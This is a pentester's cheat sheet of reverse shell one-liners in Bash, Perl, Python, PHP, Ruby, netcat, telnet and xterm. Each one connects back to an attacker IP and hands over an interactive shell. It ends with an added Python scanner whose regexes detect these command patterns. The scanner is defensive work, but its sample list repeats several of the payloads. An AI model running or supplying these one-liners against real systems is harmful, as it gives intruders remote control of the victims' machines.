There are many pages on the web documenting quick reverse shell one-liners. Pentestmonkey and Bernardo Damele have written a good few posts between them, but I wanted to recapture what they’ve got for my own notes (it’s easier for me to find stuff if it’s in one place). All credit goes to both of them; that is where all of this info came from.
Step one – Set up your listener.
nc -l -v attackerip 4444
In all these examples the attacker IP will be 192.168.0.100.
Bash
exec 5<>/dev/tcp/192.168.0.100/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/192.168.0.100/4444; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/192.168.0.100/4444 0>&1
Perl
perl -e 'use Socket;$i="192.168.0.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
For Windows-based systems you can use:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e 'f=TCPSocket.open("192.168.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
The following does not need /bin/sh:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
The following is for Windows-based systems:
ruby -rsocket -e 'c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NetCat
nc -e /bin/sh 192.168.0.100 4444
nc -c /bin/sh 192.168.0.100 4444
/bin/sh | nc 192.168.0.100 4444
If the -e flag is not available (netcat built without it), you can get around it using the following:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p
Java
Telnet
If netcat is missing (and in most cases you won't have it), then use telnet:
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.100 4444 0</tmp/p | /bin/sh 1>/tmp/p
telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445
# also listen on your machine on port 4445/tcp
Xterm
This one is a little trickier: you need to start a listener on the attacker box to catch the incoming xterm (Xnest has to stay running, so it is backgrounded here):
Xnest :1 & xterm -display 127.0.0.1:1
and then inside the spawned xterm session run this:
xhost +victimip
Then on the victim you need to run this:
xterm -display 192.168.0.100:1
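As an added defender-side example (not from the original post or from the sources it credits): a small Python scanner that flags process command lines matching the families of one-liners collected above (/dev/tcp redirection, nc -e/-c, mkfifo or mknod plus nc/telnet, interpreter socket-then-exec, and a remote xterm display). The pattern names and the sample telemetry lines are constructed for this example; tune the regexes to your own process-auditing format.

```python
import re
from typing import Dict, List

# One regex per family of one-liner collected in the notes above.
# The pattern names are hypothetical labels chosen for this example.
REVERSE_SHELL_PATTERNS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "nc_exec": re.compile(r"\bnc\b.*\s-[ce]\s+/bin/(?:ba)?sh"),
    "fifo_nc_or_telnet": re.compile(r"\b(?:mkfifo|mknod)\s+\S+.*\b(?:nc|telnet)\b"),
    "shell_piped_to_nc": re.compile(r"/bin/(?:ba)?sh\s*\|\s*(?:nc|telnet)\b"),
    "interp_socket_exec": re.compile(
        r"\b(?:python[0-9.]*|perl|php|ruby)\b.*(?:socket|fsockopen|TCPSocket)"
        r".*(?:dup2|exec|fdopen|popen)",
        re.IGNORECASE,
    ),
    "xterm_remote_display": re.compile(r"\bxterm\b.*-display\s+\d{1,3}(?:\.\d{1,3}){3}:\d+"),
}


def classify(cmdline: str) -> List[str]:
    """Return the names of every pattern that matches a single process command line."""
    return [name for name, rx in REVERSE_SHELL_PATTERNS.items() if rx.search(cmdline)]


def scan(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Return only the command lines that trip at least one pattern, with their tags."""
    return [{"cmdline": c, "tags": t} for c in cmdlines if (t := classify(c))]


# Constructed sample telemetry: five one-liners from the notes above and four benign commands.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/192.168.0.100/4444 0>&1",
    "nc -e /bin/sh 192.168.0.100 4444",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"192.168.0.100\",4444));os.dup2(s.fileno(),0);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "xterm -display 192.168.0.100:1",
    "nc -zv 192.168.0.5 443",  # plain port check, no shell attached
    "python3 -c 'import socket; print(socket.gethostname())'",  # uses socket, never execs
    "ls -la /tmp",
    "xterm -display :0",  # local display, not a remote box
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(", ".join(hit["tags"]), "<-", hit["cmdline"])
```

Run it against the constructed sample and only the five reverse-shell lines are reported; the benign nc port check, the socket-only Python call and the local xterm stay quiet.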